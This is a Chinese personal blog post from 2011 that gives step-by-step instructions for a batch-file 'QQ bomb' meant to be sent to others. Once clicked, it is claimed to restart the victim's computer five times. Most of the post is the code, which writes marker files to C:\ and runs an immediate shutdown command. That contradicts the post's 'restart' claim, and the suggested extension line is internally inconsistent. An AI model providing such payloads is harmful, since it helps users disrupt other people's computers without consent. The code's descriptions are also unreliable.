新用户登入 登录
萌子岛 返回首页

591862924的个人空间 https://www.dommdo.com/?441374 [收藏] [复制] [RSS]

日志

这是举报别人QQ的。别看

已有 262 次阅读2011-11-10 20:23 | 记事本, 电脑, 制作

教大家一个非常简单的bat文件使用,这里可以当成QQ炸弹用。

以下的代码,如果你让对方点击了,他的电脑会连续重启5次。不信可以自己制作完点击试一下。
非常简单,复制以下代码到记事本:

@echo off
if not exist c:\1.txt echo.>c:\1.txt& goto err1
if not exist c:\2.txt echo.>c:\2.txt& goto err1
if not exist c:\3.txt echo.>c:\3.txt& goto err1
if not exist c:\4.txt echo.>c:\4.txt& goto err1
if not exist c:\5.txt echo.>c:\5.txt& goto err1
goto err2
:err1
shutdown -s -t 0
:err2
以上的意思我就不多说了,如果你想让对方连续重新启动,那就无限的增加下去,如在“if not exist c:\5.txt echo.>c:\5.txt& goto err1”后面增加“if not exist c:\5.txt echo.>c:\6.txt& goto err1”


复制完以后,保存到记事本,把记事本文件更改为 .bat后缀的文件。



路过

雷人

握手

鲜花

鸡蛋

评论 (0 个评论)

小黑屋|萌子岛

GMT+8, 2025-2-5 18:36 , Processed in 0.032854 second(s), 21 queries , Gzip On, MemCache On.

Copyright 2020  atollmoe©.a2.1.0 All rights reserved. 9+

Copyright 2009  supported by zhixuan© oeo© oko© All rights reserved.Thank you!

返回顶部